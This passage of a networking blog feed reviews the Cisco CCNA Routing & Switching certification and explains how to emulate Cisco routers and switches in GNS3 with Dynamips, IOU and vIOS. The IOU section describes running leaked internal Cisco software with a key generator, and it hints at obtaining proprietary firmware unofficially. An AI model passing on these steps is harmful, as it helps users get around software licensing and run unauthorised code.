<p class="admonition-title">Note</p>
<p>Note that Cisco certifications may not have the actual <span class="caps">CCNA</span> R&S
certification as a prerequisite, but the <span class="caps">CCENT</span> instead which is half
of the <span class="caps">CCNA</span> R&S.</p>
<p>If you are interested in networking (and I expect you are when you
intend to pass a Cisco exam) I warmly encourage you to pass the full
<span class="caps">CCNA</span> R&S certification instead of …</p></div></li></ul><h3 id="the-five-ws"><a class="toclink" href="#the-five-ws">The five Ws</a></h3>
<ul>
<li>
<p><strong>What</strong>:
<span class="caps">CCNA</span> Routing <span class="amp">&</span> Switching is a technical certification about
enterprise-grade <span class="caps">IT</span> networking from Cisco.
It covers the involved devices, protocols and how to implement them
using Cisco technologies.</p>
</li>
<li>
<p><strong>When</strong>:
This is an entry-level certification with no prerequisite.</p>
</li>
<li>
<p><strong>Why</strong>:
This certification demonstrate a good level of familiarity with
enterprise networks and Cisco’s <span class="caps">IOS</span>-based devices.</p>
<p>It is a de-facto standard in terms of <span class="caps">IT</span> networking certification, valuable
even for employers using different technologies than Cisco, and
is also a prerequisite for several other Cisco certifications.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Note that Cisco certifications may not have the actual <span class="caps">CCNA</span> R&S
certification as a prerequisite, but the <span class="caps">CCENT</span> instead which is half
of the <span class="caps">CCNA</span> R&S.</p>
<p>If you are interested in networking (and I expect you are when you
intend to pass a Cisco exam) I warmly encourage you to pass the full
<span class="caps">CCNA</span> R&S certification instead of limiting yourself to the <span class="caps">CCENT</span> as
<span class="caps">IMHO</span> the latter really feels like a truncated version of the <span class="caps">CCNA</span> R&S
and makes you miss a lot of interesting areas.</p>
</div>
</li>
<li>
<p><strong>Who</strong>:
This certification is suitable for anyone willing to learn more about
enterprise-grade networking.</p>
<p>While the implementation part obviously relies on Cisco devices, the core
of this certification focuses on general knowledge on enterprise-grade
networks, in particular their architecture and various protocols involved
at each layer.</p>
</li>
<li>
<p><strong>Where</strong>:
The exam can be taken in any Pearson <span class="caps">VUE</span> test center.
It is a mix of MCQs and tasks to accomplish in a virtual lab.</p>
<p>You can get this certification through either one or two exams, depending
on your preference (personally I took the single-exam route, but the two
exams route is also equally valid).</p>
</li>
</ul>
<h3 id="training-material"><a class="toclink" href="#training-material">Training material</a></h3>
<h4 id="building-a-lab"><a class="toclink" href="#building-a-lab">Building a lab</a></h4>
<p>Building your own lab is a major part of the <span class="caps">CCNA</span> learning-path, be it a
virtual or physical lab.</p>
<ul>
<li>
<p>If you plan to work as a network engineer, I highly advise you to buy real
physical Cisco hardware.</p>
<p>The <span class="caps">CCNA</span> certification doesn’t require a lot of components and doesn’t
require last-generation devices.
Paul Browning, author of <em>Cisco <span class="caps">CCNA</span> in 60 days</em> (see below) made a very
good video on <a href="https://www.youtube.com/watch?v=dWOlc4uu_DI" rel="external" title="CCNA Home Lab - How to Build (YouTube)">how to build your home lab</a>.</p>
</li>
<li>
<p>On my side, as a security guy I specifically wanted to more focus on the
virtualization-side.
This was not an attempt to avoid using real gear as it would
have certainly be a fun experience (and maybe easier than hunting down
for firmware images and virtualization issues) but we all have to manage
our available time and to focus on the practical knowledge which will be
most beneficial for us down the road.
In my case, being to able to build virtual network allowing to reproduce
vulnerabilities and attack techniques seemed more relevant.</p>
<p>Being also a free-software guy, I did not went the Cisco <span class="caps">VIRL</span> route either
but instead learned the ins and out of <span class="caps">GNS3</span>.
You will find all my notes on this subject in the
<a href="https://www.whitewinterwolf.com/tags/virtualization/" rel="tag" title="View articles tagged 'virtualization'">virtualization</a> section.</p>
</li>
</ul>
<p>Building a lab should mean something for you.
As I said in my <a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post on professional certification</a>, the whole
process will require a lot of time and effort, you must do this
not for a certification or for an employer, you must primarily do this
<em>for yourself</em>.</p>
<p>As Keith Barker summarizes it well in a very interesting video:
<em><a href="https://www.youtube.com/watch?v=EgTdoqcGXRA" rel="external" title="Building a Home Lab: The Mindset (YouTube)">Find your Passion</a></em>.</p>
<h4 id="learning-resources"><a class="toclink" href="#learning-resources">Learning resources</a></h4>
<ul>
<li>
<p><a href="https://www.subnetting.net/" rel="external">subnetting.net</a>:
<span class="lb-small floatright"><a href="#subnetting-net.jpg" id="subnetting-net.jpg-thumb" title="Click to enlarge"><img alt="Subnetting.net logo" src="https://www.whitewinterwolf.com/posts/2017/08/21/ccna-routing-switching-certification-review/subnetting-net.jpg"/></a></span>
Get your training from this website!
At $5 per month, I don’t think you can get cheaper and for the price you
get very well-made videos, well-thoughts hands-on exercises, study sheets,
practice questions and the whole gets regularly updated to follow Cisco’s
requirement evolution.</p>
<p>The whole thing is very well organized, with a logical progression, and
ensures a proper coverage of the knowledge required both to allow you to
pass the exam but also to prepare you to the real life.</p>
<p><a href="https://www.subnetting.net/company-info" rel="external">Kevin and Trey</a> really made an
awesome job with this website, you seriously can’t get wrong with them!</p>
</li>
<li>
<p><a href="https://www.amazon.com/Routing-Switching-Complete-Study-Guide/dp/1119288282?tag=electronicfro-20" rel="external" title="CCNA Routing and Switching Study Guide (Amazon)">Sybex <span class="caps">CCNA</span> Routing and Switching - Study Guide</a> by Todd Lammle:
This book is very massive, more than a thousand of pages, I did not even
attempt to read it from cover to cover.
However, this books really shines as a secondary source for your studies
(and later) as a reference book, to get things explained a different way,
find different examples, etc.</p>
<p>While I highly recommend this book as a secondary source of information,
I would not recommend it as your main or only source.
The thousand pages of this book follow a thematic organization, which
is really great to quickly search and find some information, but awful if
you need to learn it from cover to cover and must still remember very
accurately the protocol your learned 800 pages ago and did not used since then.</p>
</li>
<li>
<p><a href="https://www.amazon.com/Cisco-CCNA-Days-William-Browning/dp/0956989292?tag=electronicfro-20" rel="external" title="Cisco CCNA in 60 Days (Amazon)">Cisco <span class="caps">CCNA</span> in 60 days</a> by Paul Browning et al.:
This book focuses on hand-on exercises with a good dose of motivational
discourses and a structured daily planning spread over 60 days to take your
hand and allow you to successfully pass the exam.</p>
<p>The originality of this book is indeed this 60 days planning, where each
day matches a chapter with its daily lesson and dose of practical exercises.</p>
<p>The first part of the book, where the foundations are being laid, is very
demanding while the rest of book, simply adding new concepts on top of the
building in an incremental way, are far more easier.
I therefore highly recommend to start this book during a vacation period,
where you can easily dedicate enough of your time to get your foundations
right, then you will find easier it to mix your <span class="caps">CCNA</span> studies with you daily activity.</p>
<p>Personally I have no problem in organizing my studies my own way and prefer
to do so.
I enjoyed the first part and learned the <span class="caps">IOS</span> shell with this book, but
later-on it became merely a secondary study book.
But even as a secondary source of information this book remains great:
it’s table-of-content allows to directly find the days covering certain
notions and the courses are always to-the-point and highly practical.</p>
<p>Moreover, the author provides a very interesting <span class="caps">PDF</span> about the mindset to
develop while working for certification (whether it is this one or any
other one).
It is indeed the Paul’s point-of-view that a lot of people fail not because
of technical knowledge, but because of improper mindset, and he does
a more thorough job in this area than any other author on the subject.
This alone could be a sufficient reason to buy this book.</p>
</li>
</ul>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Cisco regularly updates its exams, requiring training books to be updated.</p>
<p>Don’t blindly buy the books linked here: they are the latest edition
available while I write this article but may be outdated when you read it.</p>
<p>Always check the exact identifier of the exam you want to take and ensure
that the book you choose matches it.</p>
</div>
<h4 id="exam-simulation"><a class="toclink" href="#exam-simulation">Exam simulation</a></h4>
<p>The <span class="caps">CCNA</span> exam is a widely known exam:</p>
<ul>
<li>
<p>Each of the above mentioned learning sources already come with a good pile
of questions to practice before taking the exam.
These questions are good quality and usually provide an explanation about
the right answer.</p>
</li>
<li>
<p>In case this is not enough for you, you can also search the web for
supplementary questions.
Beware however that the quality of the questions freely available on the
Internet may vary a lot, sometimes what is given as the right answer isn’t
even the correct one!</p>
<p>Moreover, I also send you back to the explanation on my
<a href="/posts/2017/08/17/are-certifications-useful-a-few-words-about-career-plans/" title="Are certifications useful? A few words about career plans.">general post</a> about professional certification on why you should
stay away from websites offering “brain dumps” or “real exam questions”.
There is enough legal learning material for the <span class="caps">CCNA</span> R&S certification to
not enter in such grey area.</p>
</li>
<li>
<p>At last, to get familiar with the exam <span class="caps">GUI</span> and various types of questions
you will be asked, Cisco provides a <a href="https://www.cisco.com/c/en/us/training-events/training-certifications/exam-tutorial.html" rel="external" title="Cisco Certification Exam Tutorial (Cisco)">free online exam tutorial</a>
(this requires Flash Player).
Note that a significant part of the Cisco exam goes beyond classical
multiple choices questions and rely on a graphical interface specific to
Cisco exams.</p>
<p>You will have the same kind of tutorial on the exam day, right before
starting the test.
I recommend you however to familiarize yourself with the <span class="caps">GUI</span> <em>before</em> taking
the exam as, if you’re like me, you may want to take advantage of this
upfront time to fill your whiteboard with subnetting tables<sup id="fnref-1"><a class="footnote-ref" href="#fn-1">1</a></sup>.</p>
</li>
</ul>
<h3 id="personal-impressions"><a class="toclink" href="#personal-impressions">Personal impressions</a></h3>
<h4 id="curriculum"><a class="toclink" href="#curriculum">Curriculum</a></h4>
<p>The <span class="caps">CCNA</span> exam does a great job in learning about enterprise-grade networks,
no wonder it imposed itself as a de-facto standard on the subject.</p>
<p>If you aren’t following a golden spoon-fed thousands dollars training path, you
will have to build your own lab.
While this may seem a daunting task (it is hard to choose and install
devices you don’t know yet), it is very educating.</p>
<p>The balance between Cisco-proprietary and common standard information, at least
in the sources I mentioned above, is well preserved making this certification
useful to have a better understanding of both Cisco technologies and of common
standard surrounding such networks.</p>
<p>The <span class="caps">CCNP</span>-level certifications, the logical sequel of the CCNAs, seem far more
focused on Cisco technologies.
You may therefore be interested in taking only the <span class="caps">CCNA</span> first, and potentially
progress toward the <span class="caps">CCNP</span> only if you find yourself hired at a position dealing
with Cisco devices on a regular basis.
Otherwise the <span class="caps">CCNA</span> R&S is valuable certification by itself.</p>
<p>For those who take the two exam route, on the contrary I don’t consider the
<span class="caps">CCENT</span> to be a valuable certification by itself.
It just feels like a truncated <span class="caps">CCNA</span> R&S and has no real professional
benefits, except serving as a prerequisite for some other Cisco certifications
or for students as proof of good-will before getting their first job.</p>
<h4 id="exam"><a class="toclink" href="#exam">Exam</a></h4>
<p>The questions themselves are good: they are clear and non-ambiguous.
They <em>globally</em> follow the certification curriculum, but Cisco
expects the student to have done its own research and practical studies
allowing him to answer more general questions outside of the curriculum.</p>
<p>This is stated explicitly in the <a href="https://learningnetwork.cisco.com/community/certifications/ccna/ccna-exam/exam-topics" rel="external" title="Cisco Certified Network Associate: Exam Description (Cisco)"><span class="caps">CCNA</span> exam description</a>:</p>
<blockquote>
<p>The following topics are general guidelines for the content likely to be
included on the exam.
However, other related topics may also appear on any specific delivery of
the exam.</p>
</blockquote>
<p>From my personal experience however they do not abuse of this, as I said
the questions were good.</p>
<p>The only hindrance were several formatting issues in the questions,
typically broken <span class="caps">XML</span> tags randomly leaking in the question and answer captions
making in few rare occasions answering more a guess than anything else
(this exam was the only one for which I found myself regularly using the
<em>Comment</em> button to notify Cisco teams about these issues).</p>
<p>This affected about a dozen of questions with one where the answers were barely
readable, enough to make their exam feel cheap and dirty: Cisco really
should try to improve this.</p>
<h4 id="conclusion"><a class="toclink" href="#conclusion">Conclusion</a></h4>
<p>This is a very good certification.
I warmly recommend it to anyone wanting to take the step from home <span class="caps">LAN</span> knowledge
to corporate <span class="caps">LAN</span>.</p>
<div class="footnote">
<hr/>
<ol>
<li id="fn-1">
<p>The memory of me frantically filling the whiteboard with lines, numbers
and calculus <em>even before the first question was asked</em> seems odd even now, but
this is clearly the way to go to start the examination serenely :). <a class="footnote-backref" href="#fnref-1" title="Jump back to footnote 1 in the text">↩</a></p>
</li>
</ol>
</div>How to add Cisco IOS-based devices in GNS32017-08-19T00:00:00+02:002017-08-19T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-19:/posts/2017/08/19/how-to-add-cisco-ios-based-devices-in-gns3/<p><span class="caps">GNS3</span> historical use-case was to act as a <span class="caps">GUI</span> around Dynamips to emulate Cisco
devices.
However, while stable, this emulation may not be as straightforward as it could
be and has some limitations.</p>
<p>To understand the negatives, we first need to understand how <span class="caps">IOS</span>-based
Cisco hardware work.</p>
<h3>How real gear works</h3>
<p>Professional switch and router devices cannot be reduced to a general purpose
small-factor computer with a few additional network interfaces.</p>
<p>When using a general purpose computer with classical network adapters to build
a router/firewall appliance, all the processing occurs at the software level,
generally the operating system kernel.</p>
<p>On specialized hardware such as Cisco switches and routers, the operating
system (here <span class="caps">IOS</span>) works tightly with some underlying specific (and usually
proprietary) hardware and delegates parts or all of the processing to dedicated
chips, the Application Specific Integrated Circuits or ASICs, to allow faster processing.</p>
<p>On general-purpose computers …</p><p><span class="caps">GNS3</span> historical use-case was to act as a <span class="caps">GUI</span> around Dynamips to emulate Cisco
devices.
However, while stable, this emulation may not be as straightforward as it could
be and has some limitations.</p>
<p>To understand the negatives, we first need to understand how <span class="caps">IOS</span>-based
Cisco hardware work.</p>
<h3 id="how-real-gear-works"><a class="toclink" href="#how-real-gear-works">How real gear works</a></h3>
<p>Professional switch and router devices cannot be reduced to a general purpose
small-factor computer with a few additional network interfaces.</p>
<p>When using a general purpose computer with classical network adapters to build
a router/firewall appliance, all the processing occurs at the software level,
generally the operating system kernel.</p>
<p>On specialized hardware such as Cisco switches and routers, the operating
system (here <span class="caps">IOS</span>) works tightly with some underlying specific (and usually
proprietary) hardware and delegates parts or all of the processing to dedicated
chips, the Application Specific Integrated Circuits or ASICs, to allow faster processing.</p>
<p>On general-purpose computers, this can be compared with the <span class="caps">GPU</span> located on
graphical cards which allows to delegate 3D computation to allow a faster
rendition than with the main general-purpose <span class="caps">CPU</span>.</p>
<p><span class="lb-small"><a href="#real-gear.png" id="real-gear.png-thumb" title="Click to enlarge"><img alt="Cisco IOS-based devices stacks" src="https://www.whitewinterwolf.com/posts/2017/08/19/how-to-add-cisco-ios-based-devices-in-gns3/real-gear.png"/></a></span></p>
<p>Data processed at the hardware level do not involve the main <span class="caps">CPU</span> running <span class="caps">IOS</span>,
only the dedicated <span class="caps">ASIC</span>, and is handled faster resulting in lower latency.
On the other side, data processed at the software level allows more complex processing.</p>
<p>Most of the switching logic of Cisco Catalyst devices is implemented at the
hardware level.
Thus, emulating a Cisco catalyst device to run its <span class="caps">IOS</span> images would imply
to reverse-engineer and reimplement most of the switch features.</p>
<p>On the other side, most of Cisco routers logic occurs at the software level as
part of the <span class="caps">IOS</span> firmware.
Emulating a Cisco router hardware to run its <span class="caps">IOS</span> images is therefore easier
than emulating Cisco switches.</p>
<p>Dynamips, the Cisco devices emulator used by <span class="caps">GNS3</span>, only emulates router
devices.
However, we will see some workarounds allowing to still have some Cisco
switching features in your <span class="caps">GNS3</span> topologies.</p>
<h3 id="cisco-devices-virtualization-and-emulation"><a class="toclink" href="#cisco-devices-virtualization-and-emulation">Cisco devices virtualization and emulation</a></h3>
<p>There are several possibilities to add Cisco devices in your <span class="caps">GNS3</span> topologies,
some go through virtualization and other through emulation.
These two notions must not be confused in order to better understand the
advantages and limitations of each solution:</p>
<ul>
<li>
<p><em>Virtualization</em> software emulate Cisco devices hardware to execute
unmodified Cisco <span class="caps">IOS</span> firmware images.</p>
<p>This is slower and consumes more resources than emulation software, but
by running a genuine <span class="caps">IOS</span> it provides an experience closer to using a real
Cisco device.</p>
</li>
<li>
<p><em>Emulation</em> software emulate a whole Cisco device, including the <span class="caps">IOS</span>
operating system.</p>
<p>This is faster and is more resource efficient, but depending on the
fidelity of the emulation the final result may not have the same options
or behavior as real gear.</p>
</li>
</ul>
<h4 id="dynamips"><a class="toclink" href="#dynamips">Dynamips</a></h4>
<p>Dynamips is a free software emulating Cisco routers hardware, thus allowing
to run unmodified <span class="caps">IOS</span> firmware images in a virtualized environment.</p>
<p>While Dynamips allows to emulate a wide range of routers, two are of special
interest and are the most widely used: the c3725/c3745 and c7200 devices.</p>
<p>Any valid image for these devices is sufficient in most situation.
If, however, you require some specific features or would-like more information
on the features proposed by a given firmware image, you can freely check the
on-line <a href="http://www.cisco.com/go/fn" rel="external" title="Cisco Feature Navigator">Cisco Feature Navigator</a>.</p>
<h5 id="cisco-37253745-integrated-services-routers"><a class="toclink" href="#cisco-37253745-integrated-services-routers">Cisco 3725/3745 integrated services routers</a></h5>
<p>These routers accept Cisco EtherSwitch modules, allowing to add some switching
ability to the router, and the good news is that Dynamips offer a basic but
stable emulation of these modules.</p>
<p>These devices are end-of-life now, they only run <span class="caps">IOS</span> 12.x, but they are
very versatile as they can act not only as a router but also as a layer-2 or
layer-3 switch in your <span class="caps">GNS</span>-3 topology.</p>
<p>There is still a few difference between an EtherSwitch router module and an
actual Catalyst switch (note that these differences come from how the
EtherSwitch module itself works, not from Dynamips):</p>
<ul>
<li>Some commands are slightly different.
For instance, the <code>show vlan</code> command from Catalyst devices becomes
<code>show vlan-switch</code> on routers with the EtherSwitch module.</li>
<li><span class="caps">DTP</span> is not supported by the EtherSwitch module: no dynamic mode available
on the EtherSwitch ports and the command <code>switchport nonegotiate</code> is not available.</li>
<li>Only standard versions of the <span class="caps">STP</span> and EtherChannel protocols are available,
Cisco extensions are not available for these protocols.</li>
<li>No Gigabit port available (but it remains possible to “cheat” by setting
the bandwidth value manually without negative impact in a virtual topology).</li>
<li>The port-security feature is not available.</li>
</ul>
<p>The <span class="caps">GNS3</span> users forum hosts a more complete list of <a href="http://forum.gns3.net/topic229.html" rel="external" title="List of missing switching features in GNS3">missing features</a>.</p>
<p>As we will see below, some of these limitation can be solved by using
<a href="#iou"><span class="caps">IOU</span></a>.</p>
<h5 id="cisco-7200-series-routers"><a class="toclink" href="#cisco-7200-series-routers">Cisco 7200 series routers</a></h5>
<p>These devices are more recent and allow to run <span class="caps">IOS</span> 15.x images.</p>
<p>They have no switching capability, but they remain useful when you want to
test some feature specific to <span class="caps">IOS</span> 15.x (for instance entry-level Cisco
certifications require students to be familiar with the new licenses management
features which came with <span class="caps">IOS</span> 15.0).</p>
<h5 id="finding-ios-firmware-images-for-dynamips"><a class="toclink" href="#finding-ios-firmware-images-for-dynamips">Finding <span class="caps">IOS</span> firmware images for Dynamips</a></h5>
<p><span class="caps">IOS</span> firmware images are proprietary software.
Their license forbids free redistribution (yes, even the old obsolete ones!).</p>
<ul>
<li>
<p>If your company is a Cisco Partner, then it should have access to Cisco’s
<span class="caps">IOS</span> firmwares download pages.</p>
</li>
<li>
<p>Otherwise, you are expected to extract the firmware from a device you
bought (it can be a second-hand router, this doesn’t matter, as long as it
is the right model) and extract its firmware image as you would do to back
it up on a <span class="caps">TFTP</span> server.</p>
</li>
</ul>
<p>Alternatively, you can do as <a href="https://www.youtube.com/watch?v=VgoFXwb1QvI" rel="external" title="Building a Cisco CCNA Security Virtual Lab (YouTube)">Keith Barker</a> and do some
“snooping around” ;) .</p>
<h5 id="install-ios-firmware-images-in-gns3"><a class="toclink" href="#install-ios-firmware-images-in-gns3">Install <span class="caps">IOS</span> firmware images in <span class="caps">GNS3</span></a></h5>
<p>Installing an <span class="caps">IOS</span> firmware in <span class="caps">GNS3</span> requires several steps.
Most of them are shown during the first four minutes in <a href="https://www.youtube.com/watch?v=ubyZGXjUsjs" rel="external" title="MicroNugget: The ASA in GNS3 (YouTube)">this video</a>
by Anthony Sequeira (note that this video shows an older version of <span class="caps">GNS3</span>).</p>
<p>The complete procedure goes as follow:</p>
<ol>
<li>
<p>From <span class="caps">GNS3</span> option tab, go in <em>Edit</em> > <em>Preferences</em> to open the <em>Preferences</em> window.</p>
</li>
<li>
<p>On the left pane, go in <em>Dynamips</em> > <em><span class="caps">IOS</span> routers</em>, then click the <em>New</em> button.</p>
</li>
<li>
<p>Select you <span class="caps">IOS</span> image file location.
When asked, it is recommended to accept to copy it to <span class="caps">GNS3</span> own directory tree.</p>
</li>
<li>
<p>With a sane image file, the device type should be automatically detected.</p>
<p>If the selected device supports EtherSwitch modules, a supplementary
checkbox labeled <em>This is an EtherSwitch router</em> becomes available.
This checkbox tells <span class="caps">GNS3</span> to consider this device more as a switch than
a router.</p>
<p>Ticking this box sets the following template properties:</p>
<ul>
<li>It adds by default a <span class="caps">NM</span>-<span class="caps">ESW16</span> EtherSwitch module in the first device
slot.
This is the only really important action, the other ones are merely cosmetic.</li>
<li>It enables the use of a specific startup script which set the default
port configuration to better mimic those from a switch and set a
specific hostname.</li>
<li>The device template is associated to the <em>Switches</em> category instead
of the <em>Routers</em> one.</li>
<li>The device icon is changed accordingly.</li>
</ul>
<p>Each of these settings can also be set later manually by right-clicking
on the device template to access the <em>Configure template</em> window.</p>
</li>
<li>
<p>Unless you have some specific needs, the <span class="caps">RAM</span> size and modules can be
left at their default values.</p>
</li>
<li>
<p>Now you need to determine a valid <em>Idle-<span class="caps">PC</span></em> value for your <span class="caps">IOS</span> image.
Simply click on the <em>Idle-<span class="caps">PC</span> finder</em> button and let <span class="caps">GNS3</span> do all the work.</p>
<ul>
<li>
<p>If the <em>Idle-<span class="caps">PC</span> finder</em> does not work, try to use it several times.
With some images it will work only on the second or third attempt.</p>
<p>If this still doesn’t work:</p>
<ul>
<li>Finish the procedure normally.</li>
<li>Add the newly created device in a new topology.</li>
<li>Start it and open its console (right-click > <em>Console</em>) and wait
the end of boot process, when the device is indeed Idle and showing
its prompt.</li>
<li>Now right-click and select <em>Auto Idle-<span class="caps">PC</span></em>, this should work now.</li>
</ul>
</li>
<li>
<p>For the curious who wonder what this value means:</p>
<p>When Dynamips executes your <span class="caps">IOS</span> image code, at some point the
execution flow enters in an infinite loop waiting for an event to happen
(a incoming packet on a network interface, a key pressed on the console, etc.).
This infinite loop makes Dynamips to consume 100% of a host <span class="caps">CPU</span> core.</p>
<p>The solution is to determine the address of an instruction within the
firmware file corresponding to this loop (and nothing else).
This address is called the <em>Idle-<span class="caps">PC</span></em>, it is a value of the Program Counter
allowing to recognize when the device is in idle state.</p>
<p>As we will see later, the Dynamips process will regularly pause for
some milliseconds when the <span class="caps">IOS</span> execution flow passes through this
instruction, thus reducing the <span class="caps">CPU</span> consumption to a reasonable value.</p>
</li>
</ul>
</li>
<li>
<p>Click on the <em>Finish</em> button to create the template.</p>
</li>
<li>
<p>The default idle settings are very conservative.
When using relatively large topologies, Dynamips will still consume a
noticeable amount of <span class="caps">CPU</span> even while idle.</p>
<ul>
<li>
<p>Right-click on your newly created device template and click
<em>Configure Template</em>.</p>
</li>
<li>
<p>Below the <em>Advanced</em> tab you will find the previously determined
<em>Idle-<span class="caps">PC</span></em> accompanied by an <em>Idlemax</em> and an <em>Idlesleep</em> values.</p>
<p>To reduce the host <span class="caps">CPU</span> consumption, Dynamips process counts the number
of time the <span class="caps">IOS</span> firmware instruction at the address <em>Idle-<span class="caps">PC</span></em> is
executed, each time this number reaches <em>Idlemax</em> the Dynamips process
sleeps for <em>Idlesleep</em> milliseconds.</p>
<p>The default value for <em>Idlemax</em> is 500, meaning that Dynamips sleep
every 500 executions of the instruction at the <em>Idle-<span class="caps">PC</span></em> address.</p>
<p>Setting <em>Idlemax</em> to 100 allows to reduce Dynamips <span class="caps">CPU</span> consumption
even further with no noticeable side-effect.</p>
</li>
</ul>
</li>
</ol>
<h4 id="iou"><a class="toclink" href="#iou"><span class="caps">IOU</span></a></h4>
<p><span class="caps">IOU</span> stands for <span class="caps">IOS</span> on Unix.
This is a Cisco device emulator, allegedly initially designed to run on SunOS
systems and later ported to other platforms such as Linux.</p>
<p>This was initially a internal project within Cisco, not designed to be
distributed of even discussed outside of the circle of Cisco employees.
If you are not a Cisco employee, you may not be authorized to use this software.</p>
<p>Nevertheless, an experimental version of this software leaked outside of Cisco
offices.
While being experimental and having its own serious issues, it is still an
interesting alternative solving some of Dynamips-based <span class="caps">IOS</span> virtualization issues.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Unlike <span class="caps">IOS</span> firmwares which run in a virtualized environment controlled by
the Dynamips process, <span class="caps">IOU</span> are native executable files which execute
directly on your environment.</p>
<p>In other words: they are executable programs.</p>
<p>Would you be tempted in searching and downloading <span class="caps">IOU</span> from some untrusted
shady sources, keep in mind that they may potentially embed some malware
targeting your host and/or your network.</p>
</div>
<p>Several <span class="caps">IOU</span> binaries are available, emulating various options but more
importantly emulating devices acting at the layer 2 (switching) or the layer 3
(routing).
Layer 3 is well covered by Dynamips, however <span class="caps">IOU</span> is a really interesting
alternative to test some layer 2 functionalities not available when using Dynamips.</p>
<p>Advantages of <span class="caps">IOU</span> compared to Dynamips-based virtualization:</p>
<ul>
<li>This is the lighter and faster option available to emulate Cisco devices.</li>
<li>Port-security is functional (note though that while real gear <span class="caps">CAM</span> size is
limited to a few thousands entries, on <span class="caps">IOU</span> it can host tens of millions of
addresses, making <span class="caps">MAC</span>-flooding tests impractical).</li>
<li>EtherChannel is functional.</li>
<li><span class="caps">STP</span> options are available, but are severely broken and nearly unusable.</li>
</ul>
<p>Disadvantages of <span class="caps">IOU</span>:</p>
<ul>
<li>This is not a real <span class="caps">IOS</span>, so several options and behavior may be different
from real gear (see the <span class="caps">CAM</span> table size for instance).</li>
<li>While available, the Spanning Tree Protocol (<span class="caps">STP</span>) is severely broken.
The election process works correctly, but if there is a loop in your
topology (which is precisely what this protocol is meant to handle)
any broadcast systematically results in a broadcast storm with a very high
<span class="caps">CPU</span> consumption.
The <span class="caps">CPU</span> consumption immediately gets back to normal as soon as the loop is
broken (by disabling an interface through <span class="caps">IOS</span> for instance).</li>
<li>According to various sources, QoS is not functional either.</li>
<li>Chances are that several other things are missing or broken (impossible
for instance to set a port speed).</li>
</ul>
<p>If you want to learn more about <span class="caps">IOU</span>, the reference on the subject is
<a href="http://evilrouters.net/cisco-iou-faq" rel="external" title="Cisco IOU FAQ (evil routers)">Evil Router’s <span class="caps">FAQ</span></a>.
More background information is available on <a href="http://freeccnalabs.com/cisco-iou/" rel="external" title="Cisco IOU (freeCCNAlabs)">Free <span class="caps">CCNA</span> labs</a>, another
blog maintained by the same author.</p>
<h5 id="install-iou-in-gns3"><a class="toclink" href="#install-iou-in-gns3">Install <span class="caps">IOU</span> in <span class="caps">GNS3</span></a></h5>
<p>I am using Debian on a 64 bit architecture, depending on your system and host
architecture the exact steps you need to follow may vary.</p>
<ol>
<li>
<p><span class="caps">IOU</span> is a 32 bits executable file.
To use it on a 64 bit environment, you need to enable the 32-bits
repository to install the <span class="caps">GNS3</span> module in charge of handling <span class="caps">IOU</span> images and
all required libraries:</p>
<div class="hilitewrapper"><table class="codehilitetable"><tr><td class="linenos"><div class="linenodiv"><pre>1
2
3
4</pre></div></td><td class="code"><div class="codehilite"><pre>sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install gns3-iou
sudo ln -s /usr/lib/i386-linux-gnu/libcrypto.so.1.0.0 /usr/lib/libcrypto.so.4
</pre></div>
</td></tr></table></div>
</li>
<li>
<p>The <span class="caps">IOU</span> attempts to notify the host <em>xml.cisco.com</em> upon start, to disable
this edit your <em>/etc/hosts/</em> file and associate this name to some black-hole
loopback address:</p>
<div class="codehilite"><pre>127.99.99.99 xml.cisco.com
</pre></div>
</li>
<li>
<p>You usually also need a license key to run <span class="caps">IOU</span>, this key is calculated from
your hostname and <span class="caps">IP</span> address.
Usually a key generator (<code>keygen.py</code>) is provided with the <span class="caps">IOU</span> binaries
allowing to generate the appropriate key file.</p>
</li>
<li>
<p>In <span class="caps">GNS3</span>, don’t forget to specify the location of your license key file
in the general <em><span class="caps">IOS</span> on <span class="caps">UNIX</span></em> section from the <em>Preferences</em> screen.</p>
</li>
<li>
<p>Then go in <em><span class="caps">IOU</span> devices</em>, click <em>New</em>, this should be straight-forward.</p>
</li>
</ol>
<h4 id="vios"><a class="toclink" href="#vios">vIOS</a></h4>
<p>My personal guess is that <span class="caps">IOU</span> is an early development snapshot of what later
became the vIOS once <a href="http://brezular.com/2014/07/16/cisco-virtual-ios-on-gns3/" rel="external" title="Cisco Virtual IOS on GNS3 (Brezular)">freely downloadable</a> from Cisco website as part of
their <span class="caps">SDK</span> Cisco’s One Platform Kit (onePK), later replaced by the paid
<a href="/posts/2017/08/11/how-to-build-a-virtual-pentest-lab/#virl" title="How to build a virtual lab: VIRL"><span class="caps">VIRL</span></a> virtualization platform not freely downloadable anymore.</p>
<p>vIOS usually presents itself as a virtual machine image hosting <span class="caps">IOS</span>.
It is very similar in its form and behavior with <span class="caps">IOU</span>, there are images
available for the layer 2 and 3 but layer 2 are the most useful ones (<span class="caps">IMHO</span>).</p>
<p>Compared to <span class="caps">IOU</span>, the fact that it does not run natively on the host raises
some limitations:</p>
<ul>
<li>It consumes more resources than <span class="caps">IOU</span>, even if under some condition it <em>may</em>
remain more efficient that Dynamips images but I’m not even sure about this.</li>
<li>As with any <span class="caps">VM</span>-based images, <span class="caps">GNS3</span> doesn’t allow to modify its network links
while the <span class="caps">VM</span> is running.
Although this is usually not a problem with real end-devices nodes such as
workstations and servers, having to shutdown and restart half of your
switches each time you want to change your topology seems like a major
drawback to me.</li>
</ul>
<p>The advantage compared to <span class="caps">IOU</span>:</p>
<ul>
<li><span class="caps">STP</span> is fixed.</li>
</ul>
<p>I know, this is very short, that’s why I usually prefer to use <span class="caps">IOU</span> over vIOS.</p>
<p>Maybe there is a way to extract the emulated <span class="caps">IOS</span> from the virtual machine image.
Due to the low benefits I did not do any research in this area, but this
would allow to get the best of the two worlds.</p>How to add virtual machines (end devices nodes) in GNS32017-08-14T00:00:00+02:002017-09-25T00:00:00+02:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-08-14:/posts/2017/08/14/gns3-how-to-add-virtual-machines-end-devices-nodes/<p>Virtual machines can be added in <span class="caps">GNS3</span> topologies as end devices nodes and can
play various roles:</p>
<ul>
<li>
<p>Lightweight ones are very focused for instance to provide just enough to
test the network connectivity or provide a functional browser.</p>
<p>They start blazingly fast and are very light on resources, meaning you can
